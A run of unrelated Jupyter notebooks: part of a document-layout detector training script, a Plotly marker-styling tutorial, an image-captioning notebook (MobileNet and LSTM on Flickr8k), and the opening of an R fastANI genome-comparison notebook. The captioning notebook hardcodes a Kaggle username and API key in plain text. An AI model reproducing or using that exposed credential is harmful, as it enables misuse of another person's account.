Applying Data Augmentation only on those images which contain atleast 1 minority class so as to reduce bias in the dataset
```
#label generation for csv
for i in tqdm(range(len(files))):
box=[];
augment=False;
annoFile = root_dir + anno_dir + files[i];
f = open(annoFile, 'r');
my_xml = f.read();
anno= dict(dict(dict(xmltodict.parse(my_xml))['PcGts'])['Page'])
fname=""
for j in range(len(files[i])):
if((files[i][j])>='0' and files[i][j]<='9'):
fname+=files[i][j];
fname+=".jpg"
image = cv2.imread(final_root_dir+img_dir+fname)
height, width = image.shape[:2]
label_str = ""
for key in anno.keys():
if(key=='@imageFilename' or key=='@imageWidth' or key=='@imageHeight'):
continue
if(key=="TextRegion"):
if(type(anno["TextRegion"]) == list):
for j in range(len(anno["TextRegion"])):
text=anno["TextRegion"][j]
xmin=width
ymin=height
xmax=0
ymax=0
if(text["Coords"]):
if(text["Coords"]["Point"]):
for k in range(len(text["Coords"]["Point"])):
coordinates=anno["TextRegion"][j]["Coords"]["Point"][k]
xmin= min(xmin, int(coordinates['@x']));
ymin= min(ymin, int(coordinates['@y']));
xmax= min(max(xmax, int(coordinates['@x'])), width);
ymax= min(max(ymax, int(coordinates['@y'])), height);
if('@type' in text.keys()):
label_str+= str(xmin)+' '+str(ymin)+' '+str(xmax)+' '+str(ymax)+' '+text['@type']+' '
if(xmax<=xmin or ymax<=ymin):
continue
tbox=[];
tbox.append(xmin)
tbox.append(ymin)
tbox.append(xmax)
tbox.append(ymax)
tbox.append(text['@type'])
box.append(tbox)
else:
text=anno["TextRegion"]
xmin=width
ymin=height
xmax=0
ymax=0
if(text["Coords"]):
if(text["Coords"]["Point"]):
for k in range(len(text["Coords"]["Point"])):
coordinates=anno["TextRegion"]["Coords"]["Point"][k]
xmin= min(xmin, int(coordinates['@x']));
ymin= min(ymin, int(coordinates['@y']));
xmax= min(max(xmax, int(coordinates['@x'])), width);
ymax= min(max(ymax, int(coordinates['@y'])), height);
if('@type' in text.keys()):
label_str+= str(xmin)+' '+str(ymin)+' '+str(xmax)+' '+str(ymax)+' '+text['@type']+' '
if(xmax<=xmin or ymax<=ymin):
continue
tbox=[];
tbox.append(xmin)
tbox.append(ymin)
tbox.append(xmax)
tbox.append(ymax)
tbox.append(text['@type'])
box.append(tbox)
else:
val=""
if(key=='GraphicRegion'):
val="graphics"
augment=True
elif(key=='ImageRegion'):
val="image"
elif(key=='NoiseRegion'):
val="noise"
augment=True
elif(key=='ChartRegion'):
val="chart"
augment=True
elif(key=='TableRegion'):
val="table"
augment=True
elif(key=='SeparatorRegion'):
val="separator"
elif(key=='MathsRegion'):
val="maths"
augment=True
elif(key=='LineDrawingRegion'):
val="linedrawing"
augment=True
else:
val="frame"
augment=True
if(type(anno[key]) == list):
for j in range(len(anno[key])):
text=anno[key][j]
xmin=width
ymin=height
xmax=0
ymax=0
if(text["Coords"]):
if(text["Coords"]["Point"]):
for k in range(len(text["Coords"]["Point"])):
coordinates=anno[key][j]["Coords"]["Point"][k]
xmin= min(xmin, int(coordinates['@x']));
ymin= min(ymin, int(coordinates['@y']));
xmax= min(max(xmax, int(coordinates['@x'])), width);
ymax= min(max(ymax, int(coordinates['@y'])), height);
label_str+= str(xmin)+' '+str(ymin)+' '+str(xmax)+' '+str(ymax)+' '+ val +' '
if(xmax<=xmin or ymax<=ymin):
continue
tbox=[];
tbox.append(xmin)
tbox.append(ymin)
tbox.append(xmax)
tbox.append(ymax)
tbox.append(val)
box.append(tbox)
else:
text=anno[key]
xmin=width
ymin=height
xmax=0
ymax=0
if(text["Coords"]):
if(text["Coords"]["Point"]):
for k in range(len(text["Coords"]["Point"])):
coordinates=anno[key]["Coords"]["Point"][k]
xmin= min(xmin, int(coordinates['@x']));
ymin= min(ymin, int(coordinates['@y']));
xmax= min(max(xmax, int(coordinates['@x'])), width);
ymax= min(max(ymax, int(coordinates['@y'])), height);
label_str+= str(xmin)+' '+str(ymin)+' '+str(xmax)+' '+str(ymax)+' '+val+' '
if(xmax<=xmin or ymax<=ymin):
continue
tbox=[];
tbox.append(xmin)
tbox.append(ymin)
tbox.append(xmax)
tbox.append(ymax)
tbox.append(val)
box.append(tbox)
label_str=label_str[:-1]
combined.append([fname, label_str])
if(augment):
augmentData(fname, box)
df = pd.DataFrame(combined, columns = ['ID', 'Label']);
df.to_csv(final_root_dir + "/train_labels.csv", index=False);
```
# Training
```
import os
import sys
sys.path.append("Monk_Object_Detection/1_gluoncv_finetune/lib/");
from detector_prototype import Detector
gtf = Detector();
root = "Document_Layout_Analysis/";
img_dir = "Images/";
anno_file = "train_labels.csv";
batch_size=8;
gtf.Dataset(root, img_dir, anno_file, batch_size=batch_size);
```
### Available models
ssd_300_vgg16_atrous_coco
ssd_300_vgg16_atrous_voc
ssd_512_vgg16_atrous_coco
ssd_512_vgg16_atrous_voc
ssd_512_resnet50_v1_coco
ssd_512_resnet50_v1_voc
ssd_512_mobilenet1.0_voc
ssd_512_mobilenet1.0_coco
yolo3_darknet53_voc
yolo3_darknet53_coco
yolo3_mobilenet1.0_voc
yolo3_mobilenet1.0_coco
```
#vgg16 architecture, with atrous convolutions, pretrained on COCO dataset is used for this task
pretrained = True;
gpu=True;
model_name = "ssd_512_vgg16_atrous_coco";
gtf.Model(model_name, use_pretrained=pretrained, use_gpu=gpu);
gtf.Set_Learning_Rate(0.003);
epochs=30;
params_file = "saved_model.params";
gtf.Train(epochs, params_file);
```
# Inference
```
import os
import sys
sys.path.append("Monk_Object_Detection/1_gluoncv_finetune/lib/");
from inference_prototype import Infer
model_name = "ssd_512_vgg16_atrous_coco";
params_file = "saved_model.params";
class_list = ["paragraph", "heading", "credit", "footer", "drop-capital", "floating", "noise", "maths", "header", "caption", "image", "linedrawing", "graphics", "fname", "page-number", "chart", "separator", "table"];
gtf = Infer(model_name, params_file, class_list, use_gpu=True);
img_name = "Test_Images/test1.jpg";
visualize = True;
thresh = 0.3;
output = gtf.run(img_name, visualize=visualize, thresh=thresh);
img_name = "Test_Images/test2.jpg";
visualize = True;
thresh = 0.3;
output = gtf.run(img_name, visualize=visualize, thresh=thresh);
img_name = "Test_Images/test3.jpg";
visualize = True;
thresh = 0.4;
output = gtf.run(img_name, visualize=visualize, thresh=thresh);
```
### Inference
SSD512 produces outputs with very high confidence, a lot of them being 0.9+. It was also the only model which was able to identify footer and noises like division lines in the document. But it was also producing repetitive or incorrect headings such as ‘floating’ in the 2nd example (extra box with incorrect label), and graphics and paragraph in the third (2 boxes with different labels for the same region).
If these small details like footer, separator, etc. are crucial for your work and the focus is more on bounding box prediction than classification, go for SSD512. It should also be considered that gluoncv-finetune pipeline of Monk AI (which has been used for SSD512) also provides architectures which are pre-trained on various other datasets, such as COCO dataset.
| github_jupyter |
#### New to Plotly?
Plotly's Python library is free and open source! [Get started](https://plot.ly/python/getting-started/) by downloading the client and [reading the primer](https://plot.ly/python/getting-started/).
<br>You can set up Plotly to work in [online](https://plot.ly/python/getting-started/#initialization-for-online-plotting) or [offline](https://plot.ly/python/getting-started/#initialization-for-offline-plotting) mode, or in [jupyter notebooks](https://plot.ly/python/getting-started/#start-plotting-online).
<br>We also have a quick-reference [cheatsheet](https://images.plot.ly/plotly-documentation/images/python_cheat_sheet.pdf) (new!) to help you get started!
#### Version Check
Plotly's python package is updated frequently. Run `pip install plotly --upgrade` to use the latest version.
```
import plotly
plotly.__version__
```
### Add Marker Border
In order to make markers distinct, you can add a border to the markers. This can be achieved by adding the line dict to the marker dict. For example, `marker:{..., line: {...}}`.
```
import plotly.plotly as py
import plotly.graph_objs as go
import numpy as np
x = np.random.uniform(low=3, high=6, size=(500,))
y = np.random.uniform(low=3, high=6, size=(500,))
data = [
go.Scatter(
mode = 'markers',
x = x,
y = y,
marker = dict(
color = 'rgb(17, 157, 255)',
size = 20,
line = dict(
color = 'rgb(231, 99, 250)',
width = 2
)
),
showlegend = False
),
go.Scatter(
mode = 'markers',
x = [2],
y = [4.5],
marker = dict(
color = 'rgb(17, 157, 255)',
size = 120,
line = dict(
color = 'rgb(231, 99, 250)',
width = 12
)
),
showlegend = False
)]
py.iplot(data, filename = "style-add-border")
```
### Fully Opaque
Fully opaque, the default setting, is useful for non-overlapping markers. When many points overlap it can be hard to observe density.
```
import plotly.plotly as py
import plotly.graph_objs as go
import numpy as np
x = np.random.uniform(low=3, high=6, size=(500,))
y = np.random.uniform(low=3, high=6, size=(500,))
data = [
go.Scatter(
mode = 'markers',
x = x,
y = y,
marker = dict(
color = 'rgb(17, 157, 255)',
size = 20,
line = dict(
color = 'rgb(231, 99, 250)',
width = 2
)
),
showlegend = False
),
go.Scatter(
mode = 'markers',
x = [2,2],
y = [4.25,4.75],
marker = dict(
color = 'rgb(17, 157, 255)',
size = 80,
line = dict(
color = 'rgb(231, 99, 250)',
width = 8
)
),
showlegend = False
)]
py.iplot(data, filename = "style-full-opaque")
```
### Opacity
Setting opacity outside the marker will set the opacity of the trace. Thus, it will allow greater visbility of additional traces but like fully opaque it is hard to distinguish density.
```
import plotly.plotly as py
import plotly.graph_objs as go
import numpy as np
x = np.random.uniform(low=3, high=6, size=(500,))
y = np.random.uniform(low=3, high=4.5, size=(500,))
x2 = np.random.uniform(low=3, high=6, size=(500,))
y2 = np.random.uniform(low=4.5, high=6, size=(500,))
data = [
go.Scatter(
mode = 'markers',
x = x,
y = y,
opacity = 0.5,
marker = dict(
color = 'rgb(17, 157, 255)',
size = 20,
line = dict(
color = 'rgb(231, 99, 250)',
width = 2
)
),
name = 'Opacity 0.5'
),
go.Scatter(
mode = 'markers',
x = x2,
y = y2,
marker = dict(
color = 'rgb(17, 157, 255)',
size = 20,
line = dict(
color = 'rgb(231, 99, 250)',
width = 2
)
),
name = 'Opacity 1.0'
),
go.Scatter(
mode = 'markers',
x = [2,2],
y = [4.25,4.75],
opacity = 0.5,
marker = dict(
color = 'rgb(17, 157, 255)',
size = 80,
line = dict(
color = 'rgb(231, 99, 250)',
width = 8
)
),
showlegend = False
)]
py.iplot(data, filename = "style-opacity")
```
### Marker Opacity
To maximise visibility of density, it is recommended to set the opacity inside the marker `marker:{opacity:0.5}`. If mulitple traces exist with high density, consider using marker opacity in conjunction with trace opacity.
```
import plotly.plotly as py
import plotly.graph_objs as go
import numpy as np
x = np.random.uniform(low=3, high=6, size=(500,))
y = np.random.uniform(low=3, high=6, size=(500,))
data = [
go.Scatter(
mode = 'markers',
x = x,
y = y,
marker = dict(
color = 'rgb(17, 157, 255)',
size = 20,
opacity = 0.5,
line = dict(
color = 'rgb(231, 99, 250)',
width = 2
)
),
showlegend = False
),
go.Scatter(
mode = 'markers',
x = [2,2],
y = [4.25,4.75],
marker = dict(
color = 'rgb(17, 157, 255)',
size = 80,
opacity = 0.5,
line = dict(
color = 'rgb(231, 99, 250)',
width = 8
)
),
showlegend = False
)]
py.iplot(data, filename = "style-marker-opacity")
```
### Color Opacity
To maximise visibility of each point, set the color opacity by using alpha: `marker:{color: 'rgba(0,0,0,0.5)'}`. Here, the marker line will remain opaque.
```
import plotly.plotly as py
import plotly.graph_objs as go
import numpy as np
x = np.random.uniform(low=3, high=6, size=(500,))
y = np.random.uniform(low=3, high=6, size=(500,))
data = [
go.Scatter(
mode = 'markers',
x = x,
y = y,
marker = dict(
color = 'rgba(17, 157, 255, 0.5)',
size = 20,
line = dict(
color = 'rgb(231, 99, 250)',
width = 2
)
),
showlegend = False
),
go.Scatter(
mode = 'markers',
x = [2,2],
y = [4.25,4.75],
marker = dict(
color = 'rgba(17, 157, 255, 0.5)',
size = 80,
line = dict(
color = 'rgb(231, 99, 250)',
width = 8
)
),
showlegend = False
)]
py.iplot(data, filename = "style-color-opacity")
```
### Reference
See https://plot.ly/python/reference/ for more information and chart attribute options!
```
from IPython.display import display, HTML
display(HTML('<link href="//fonts.googleapis.com/css?family=Open+Sans:600,400,300,200|Inconsolata|Ubuntu+Mono:400,700" rel="stylesheet" type="text/css" />'))
display(HTML('<link rel="stylesheet" type="text/css" href="http://help.plot.ly/documentation/all_static/css/ipython-notebook-custom.css">'))
! pip install git+https://github.com/plotly/publisher.git --upgrade
import publisher
publisher.publish(
'marker-style.ipynb', 'python/marker-style/', 'Styling Markers',
'How to style markers in Python with Plotly.',
title = 'Styling Markers | Plotly',
has_thumbnail='false', thumbnail='thumbnail/marker-style.gif',
language='python',
page_type='example_index',
display_as='style_opt', order=8, ipynb='~notebook_demo/203')
```
| github_jupyter |
<a href="https://colab.research.google.com/github/fahmij8/Bangkit-Final-Project/blob/master/Mobile_Net_LSTM.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
import os
os.environ['KAGGLE_USERNAME'] = 'aflita'
os.environ['KAGGLE_KEY'] = 'cad9302366db38692e6dfc19fee87783'
# Mount Drive
from google.colab import drive
drive.mount('/content/gdrive')
import tensorflow as tf
import numpy as np
import pickle
import os
from keras.preprocessing.image import load_img
from keras.preprocessing.image import img_to_array
import numpy as np
import pickle
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from IPython.display import Image, display
from tqdm import tqdm
from keras.preprocessing import image
#from keras.models import Model
!kaggle datasets download -d shadabhussain/flickr8k
!kaggle datasets download -d rtatman/glove-global-vectors-for-word-representation
!unzip -q flickr8k.zip -d .
!unzip -q glove-global-vectors-for-word-representation.zip -d .
# Read Image Folder
image_folder = '/content/Flickr_Data/Flickr_Data/Images/'
# Read Annotation Folder
annotation_file = '/content/Flickr_Data/Flickr_Data/Flickr_TextData/Flickr8k.token.txt'
# Read Training File
train_file = '/content/Flickr_Data/Flickr_Data/Flickr_TextData/Flickr_8k.trainImages.txt'
# Read Validation File
val_file = '/content/Flickr_Data/Flickr_Data/Flickr_TextData/Flickr_8k.devImages.txt'
# Read Test File
test_file = '/content/Flickr_Data/Flickr_Data/Flickr_TextData/Flickr_8k.testImages.txt'
# Read GloVe File
glove_file ='/content/glove.6B.50d.txt'
unique_train = open(train_file, 'r').read().splitlines()
unique_val = open(val_file, 'r').read().splitlines()
unique_test = open(test_file, 'r').read().splitlines()
annotations = open(annotation_file,'r').read().splitlines()
# Collect Dataset
import re
def collect_list(unique_set):
data = []
for idx, el in enumerate(annotations):
# Split Image ID with Captions
fname, cap = re.split("#[0-9][\t]", el)
cap = cap.split()
cap = [w for w in cap if len(w)>1]
cap = ' '.join(cap)
cap = '<start> ' + cap + ' <end>'
cap = cap.lower()
if fname in unique_set:
data.append([fname,cap])
return data
train_set = collect_list(unique_train)
val_set = collect_list(unique_val)
test_set = collect_list(unique_test)
print('Collected Train Sets: %d' %len(train_set))
print('Collected Val Sets: %d' %len(val_set))
print('Collected Test Sets: %d' %len(test_set))
print('\n')
print('Unique Train Sets: %d' %len(unique_train))
print('Unique Val Sets: %d' %len(unique_val))
print('Unique Test Sets: %d' %len(unique_test))
```
**Define Model**
```
# Optional
# Define Baseline CNN Model
from tensorflow import keras
baseline_model = tf.keras.models.Sequential([
tf.keras.layers.Conv2D(64, (3,3), activation= 'relu', input_shape = (224, 224, 3)),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(64, (3,3), activation= 'relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(128, (3,3), activation = 'relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(128, (3,3), activation = 'relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Conv2D(64, (3,3), activation = 'relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(512, activation = 'relu'),
tf.keras.layers.Dense(512, activation = 'softmax')
])
baseline_model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
#baseline_model.summary()
baseline = tf.keras.Model(inputs = baseline_model.input,
outputs = baseline_model.layers[-3].output)
baseline.summary()
# Transfer Learning MobileNet
from keras.applications.mobilenet import MobileNet
from keras.models import Model, Sequential
mobilenet = tf.keras.applications.MobileNet(weights='imagenet',include_top = True, input_shape = (224,224,3))
img_model = tf.keras.Model(inputs = mobilenet.input,
outputs = mobilenet.layers[-3].output)
x = tf.keras.layers.Flatten()(mobilenet.output)
img_model = tf.keras.Model(inputs = mobilenet.input, outputs = x)
img_model.summary()
```
Preprocess Image Model
```
def preprocess_input(x):
x /= 127.5
x -= 1
return x
def preprocess(image_path):
img = image.load_img(image_path, target_size=(224, 224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
return x
def encode(image):
image = preprocess(image)
temp_enc = img_model.predict(image)
temp_enc = np.reshape(temp_enc, 1000)
return temp_enc
# Extract Image Features
train_features = {}
for img in tqdm(unique_train):
path = os.path.join(image_folder, img)
train_features[img] = encode(path)
val_features = {}
for img in tqdm(unique_val):
path = os.path.join(image_folder, img)
val_features[img] = encode(path)
train_features['3556792157_d09d42bef7.jpg'].shape, print(len(train_features)), print(len(val_features))
# Save Feature
pickle.dump(train_features, open('train_features.pkl','wb'))
pickle.dump(val_features, open('val_features.pkl','wb'))
# Load Features if Available
train_features = pickle.load(open('/content/train_features.pkl', 'rb'))
val_features = pickle.load(open('/content/val_features.pkl', 'rb'))
```
**Preprocess Captions**
```
train_captions = [train[1] for train in train_set]
val_captions = [val[1] for val in val_set]
# Token
num_words = 7380
oov = '<unk>'
filt = '!"#$%&()*+.,-/:;=?@[\]^_`{|}~ '
tokenizer = Tokenizer(num_words+1, oov_token = oov, filters = filt)
tokenizer.fit_on_texts(train_captions)
word2index = tokenizer.word_index
vocab_size = len(word2index) + 1
print('Reduced Vocabulary Size: %d' % vocab_size)
max_length = max_length = max(len(train_set[i][1].split()) for i in range(len(train_set)))
print('Description Length: %d' % max_length)
# Reverse Index to Word
index2word = dict([(value, key) for (key, value) in word2index.items()])
word2index['<start>']
# Fit Token to Texts
train_seq = tokenizer.texts_to_sequences(train_captions)
val_seq = tokenizer.texts_to_sequences(val_captions)
# Store Sequences
def create_sequence(sequence_name):
padded_sequences, subsequent_words = [], []
for seq in sequence_name:
partial_seqs = []
next_words = []
for i in range(1, len(seq)):
partial_seqs.append(seq[:i])
next_words.append(seq[i])
padded_partial_seqs = pad_sequences(partial_seqs, max_length, padding='post')
next_words_1hot = np.zeros([len(next_words), vocab_size], dtype=np.bool)
#Vectorization
for i,next_word in enumerate(next_words):
next_words_1hot[i, next_word] = 1
padded_sequences.append(padded_partial_seqs)
subsequent_words.append(next_words_1hot)
padded_sequences = np.asarray(padded_sequences)
subsequent_words = np.asarray(subsequent_words)
return padded_sequences, subsequent_words
padded_sequences, subsequent_words = create_sequence(train_seq)
vpadded_sequences, vsubsequent_words = create_sequence(val_seq)
print(padded_sequences.shape)
print(subsequent_words.shape)
print(vpadded_sequences.shape)
print(vsubsequent_words.shape)
num_of_images = 6000
captions = np.zeros([0, max_length])
next_words = np.zeros([0, vocab_size])
# Store Captions and Next Words to Disk
for i in tqdm(range(num_of_images)):
captions = np.concatenate([captions, padded_sequences[i]])
next_words = np.concatenate([next_words, subsequent_words[i]])
np.save("captions.npy", captions)
np.save("next_words.npy", next_words)
print(captions.shape)
print(next_words.shape)
# Get Images Array
imgs = []
for i in range(len(train_set)):
if train_set[i][0] in train_features.keys():
imgs.append(list(train_features[train_set[i][0]]))
imgs = np.asarray(imgs)
images = []
for ix in range(6000):#num_of_images
for iy in range(padded_sequences[ix].shape[0]):
images.append(imgs[ix])
images = np.asarray(images)
np.save("images.npy", images)
print(images.shape)
vcaptions = np.zeros([0, max_length])
vnext_words = np.zeros([0, vocab_size])
# Store Captions and Next Words to Disk
for i in tqdm(range(1000)): #1000 Validation Set
vcaptions = np.concatenate([vcaptions, vpadded_sequences[i]])
vnext_words = np.concatenate([vnext_words, vsubsequent_words[i]])
np.save("vcaptions.npy", vcaptions)
np.save("vnext_words.npy", vnext_words)
print(vcaptions.shape)
print(vnext_words.shape)
imgs = []
for i in range(len(val_set)):
if val_set[i][0] in val_features.keys():
imgs.append(list(val_features[val_set[i][0]]))
imgs = np.asarray(imgs)
#print(imgs.shape)
images = []
for ix in range(1000):#num_of_images
for iy in range(vpadded_sequences[ix].shape[0]):
images.append(imgs[ix])
images = np.asarray(images)
np.save("vimages.npy", images)
print(images.shape)
!cp -r /content/next_words.npy '/content/gdrive/My Drive/'
!cp -r /content/captions.npy '/content/gdrive/My Drive/'
```
**Model**
```
import numpy as np
captions = np.load("captions.npy")
next_words = np.load("next_words.npy")
images = np.load("images.npy")
print(captions.shape)
print(next_words.shape)
print(images.shape)
vcaptions = np.load("vcaptions.npy")
vnext_words = np.load("vnext_words.npy")
vimages = np.load("vimages.npy")
print(vcaptions.shape)
print(vnext_words.shape)
print(vimages.shape)
# Adding GloVe Vector
embeddings = {}
f = open(glove_file, encoding='utf8')
for line in f:
words = line.split()
word_embeddings = np.array(words[1:], dtype='float')
embeddings[words[0]] = word_embeddings
f.close()
len(embeddings)
embedding_matrix = np.zeros((len(word2index) + 1, 50)) #50
for word, index in word2index.items():
embedding_vector = embeddings.get(word)
if embedding_vector is not None:
embedding_matrix[index] = embedding_vector
print(embedding_matrix.shape)
```
Model LSTM
```
from keras.layers.merge import add
from keras.layers import Input
from keras.utils import plot_model
from keras.layers import LSTM, Embedding, TimeDistributed, Dense, RepeatVector, Activation, Flatten, Reshape
from keras.layers import Dropout
from keras.models import Model
from keras.layers import concatenate, Concatenate
from keras.layers.wrappers import Bidirectional
embedding_size = 50
max_len = max_length
# Image Model
image_inp = Input(shape=(1000,))
image_model = Dense(embedding_size,input_shape=(1000,),activation='relu')(image_inp)
image_model = RepeatVector(max_len)(image_model)
# Caption Model
caption_inp = Input(shape=(max_len,))
caption_model = Embedding(vocab_size, embedding_size, input_length=max_len)(caption_inp)
caption_model = LSTM(256,return_sequences=True)(caption_model) #123
caption_model = TimeDistributed(Dense(50))(caption_model)
# Decoder model
merge_model = Concatenate(axis=1)([image_model, caption_model])
merge_model = Bidirectional(LSTM(256, return_sequences=False))(merge_model) #128
merge_model = Dense(vocab_size)(merge_model)
merge_model = Activation('softmax')(merge_model)
# Tie it together [image, seq] [word]
lang_model = Model(inputs=[image_inp,caption_inp],outputs=merge_model)
lang_model.layers[2].set_weights([embedding_matrix])
lang_model.layers[2].trainable = False
lang_model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
lang_model.summary()
from keras.utils import plot_model
plot_model(lang_model, to_file='model.png', show_shapes=True)
from keras.callbacks import ModelCheckpoint
# define checkpoint callback
filepath = 'model-ep{epoch:03d}-loss{loss:.3f}-val_loss{val_loss:.3f}.h5'
checkpoint = ModelCheckpoint(filepath, monitor='val_loss', verbose=1, save_best_only=True, mode='min')
hist = lang_model.fit([images, captions], next_words, batch_size=600, epochs=20, callbacks=[checkpoint], validation_data=([vimages, vcaptions], vnext_words))
import matplotlib.pyplot as plt
# summarize history for accuracy
plt.plot(hist.history['accuracy'])
plt.plot(hist.history['val_accuracy'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
# summarize history for loss
plt.plot(hist.history['loss'])
plt.plot(hist.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
img_model.save('img_model_1000.h5')
lang_model.save('lang_model_1000.h5')
!pip install tensorflowjs
!mkdir model1000
import tensorflowjs as tfjs
tfjs.converters.save_keras_model(img_model, 'model1000/img_model')
tfjs.converters.save_keras_model(lang_model, 'model1000/lang_model')
!cp -r /content/model1000 '/content/gdrive/My Drive'
!cp -r /content/img_model_1000.h5 '/content/gdrive/My Drive'
!cp -r /content/lang_model_1000.h5 '/content/gdrive/My Drive'
```
Predict
```
from nltk.translate.bleu_score import sentence_bleu
from nltk.translate.bleu_score import SmoothingFunction
import random
from tensorflow.keras.preprocessing.sequence import pad_sequences
from keras.preprocessing import image
def preprocess_input(x):
x /= 127.5
x -= 1
return x
def preprocess(image_path):
img = load_img(image_path, target_size=(224, 224))
x = img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
return x
def encode(image):
image = preprocess(image)
temp_enc = img_model.predict(image)
temp_enc = np.reshape(temp_enc, 1000)
return temp_enc
def predict_captions(image):
start_word = ["<start>"]
while True:
par_caps = [word2index[i] for i in start_word]
par_caps = pad_sequences([par_caps], maxlen=max_len, padding='post')
#e = encoding_test[image[len(images):]]
e = encode(image)
preds = lang_model.predict([np.array([e]), np.array(par_caps)])
word_pred = index2word[np.argmax(preds[0])]
start_word.append(word_pred)
if word_pred == "<end>" or len(start_word) > max_len:
break
return ' '.join(start_word[1:-1])
#Mean bleu
max_length = 34
bleus = []
for t in unique_val:
test_img_path = os.path.join(image_folder, t)
real_cap = next(y for x,y in val_set if x==t)
#image = preprocess_image(test_img_path)
#feature = img_model.predict(image)
#feature = np.reshape(feature, feature.shape[1])
Argmax_Search = predict_captions(test_img_path)
pic = Image(filename=test_img_path)
#display(pic)
s_real = real_cap.split()
s_real = s_real[1: -1]
s_pred = Argmax_Search.split()
bleu = sentence_bleu([s_real], s_pred)
#print('Real Captions: {}'.format(''.join(real_cap)))
#print('Predicted Captions: {}'.format(Argmax_Search))
#print('BLEU: {}'.format(bleu))
#print('\n')
bleus.append(bleu)
print("Mean BLEU {}".format(np.mean(bleus)))
```
| github_jupyter |
<h1>Table of Contents<span class="tocSkip"></span></h1>
<div class="toc"><ul class="toc-item"><li><span><a href="#Goal" data-toc-modified-id="Goal-1"><span class="toc-item-num">1 </span>Goal</a></span></li><li><span><a href="#Var" data-toc-modified-id="Var-2"><span class="toc-item-num">2 </span>Var</a></span></li><li><span><a href="#Init" data-toc-modified-id="Init-3"><span class="toc-item-num">3 </span>Init</a></span></li><li><span><a href="#Load" data-toc-modified-id="Load-4"><span class="toc-item-num">4 </span>Load</a></span></li><li><span><a href="#fastani" data-toc-modified-id="fastani-5"><span class="toc-item-num">5 </span>fastani</a></span><ul class="toc-item"><li><span><a href="#Train" data-toc-modified-id="Train-5.1"><span class="toc-item-num">5.1 </span>Train</a></span></li></ul></li><li><span><a href="#Test" data-toc-modified-id="Test-6"><span class="toc-item-num">6 </span>Test</a></span></li><li><span><a href="#Loading-dist-mtx" data-toc-modified-id="Loading-dist-mtx-7"><span class="toc-item-num">7 </span>Loading dist mtx</a></span><ul class="toc-item"><li><span><a href="#Creating-plots" data-toc-modified-id="Creating-plots-7.1"><span class="toc-item-num">7.1 </span>Creating plots</a></span></li><li><span><a href="#Summary-of-'close'-genomes" data-toc-modified-id="Summary-of-'close'-genomes-7.2"><span class="toc-item-num">7.2 </span>Summary of 'close' genomes</a></span><ul class="toc-item"><li><span><a href="#Train" data-toc-modified-id="Train-7.2.1"><span class="toc-item-num">7.2.1 </span>Train</a></span></li></ul></li></ul></li><li><span><a href="#fastANI-on-all-genomes" data-toc-modified-id="fastANI-on-all-genomes-8"><span class="toc-item-num">8 </span>fastANI on all genomes</a></span></li><li><span><a href="#--WAITING--" data-toc-modified-id="--WAITING---9"><span class="toc-item-num">9 </span>--WAITING--</a></span><ul class="toc-item"><li><span><a href="#Summary" data-toc-modified-id="Summary-9.1"><span class="toc-item-num">9.1 </span>Summary</a></span><ul class="toc-item"><li><span><a href="#Adding-partition-labels" data-toc-modified-id="Adding-partition-labels-9.1.1"><span class="toc-item-num">9.1.1 </span>Adding partition labels</a></span></li><li><span><a href="#Plotting" data-toc-modified-id="Plotting-9.1.2"><span class="toc-item-num">9.1.2 </span>Plotting</a></span></li></ul></li></ul></li><li><span><a href="#sessionInfo" data-toc-modified-id="sessionInfo-10"><span class="toc-item-num">10 </span>sessionInfo</a></span></li></ul></div>
# Goal
Question: do the train & test data partitions (genomes) differ in there relatedness distribution?
Why: the metaQUAST misassembly classification distributions differ between train & test
Method: for the train and test data partitions, calculate the pairwise ANI
# Var
```
work_dir = '/ebio/abt3_projects/databases_no-backup/DeepMAsED/GTDB_ref_genomes/fastANI/'
metadata_file = '/ebio/abt3_projects/databases_no-backup/GTDB/release86/metadata_1perGTDBSpec_gte50comp-lt5cont_wPath.tsv'
train_file = file.path(work_dir, '..', 'DeepMAsED_GTDB_genome-refs_train.tsv')
test_file = file.path(work_dir, '..', 'DeepMAsED_GTDB_genome-refs_test.tsv')
threads = 24
conda_env = 'py2_genome'
```
# Init
```
library(dplyr)
library(tidyr)
library(ggplot2)
library(data.table)
library(future)
library(future.batchtools)
library(future.apply)
options(future.wait.interval = 2.0)
set.seed(8364)
#' bash job using conda env
bash_job = function(cmd, conda_env, stdout=TRUE, stderr=FALSE){
# cmd : string; commandline job (eg., 'ls -thlc')
# conda_env : string; conda environment name
cmd = sprintf('. ~/.bashrc; conda activate %s; %s', conda_env, cmd)
cmd = sprintf('-c "%s"', cmd)
system2('bash', cmd, stdout=stdout, stderr=stderr)
}
```
# Load
```
F = file.path(work_dir, 'DeepMAsED_GTDB_genome-refs_train.tsv')
metadata_f_train = read.delim(train_file, sep='\t') %>%
mutate(data_partition = 'Train')
metadata_f_train %>% dim %>% print
metadata_f_train %>% head(n=3)
F = file.path(work_dir, 'DeepMAsED_GTDB_genome-refs_test.tsv')
metadata_f_test = read.delim(test_file, sep='\t') %>%
mutate(data_partition = 'Test')
metadata_f_test %>% dim %>% print
metadata_f_test %>% head(n=3)
```
# fastani
## Train
```
# writing out genome fasta file list
F = file.path(work_dir, 'train_genomes.txt')
metadata_f_train %>%
dplyr::select(Fasta) %>%
write.table(F, sep='\t', quote=FALSE, row.names=FALSE, col.names=FALSE)
cat('File written:', F, '\n')
cmd = 'fastANI {params} --threads {threads} --ql {query_genomes} --rl {ref_genomes} -o {output}'
params = '--fragLen 1000 --minFrag 50 -k 16'
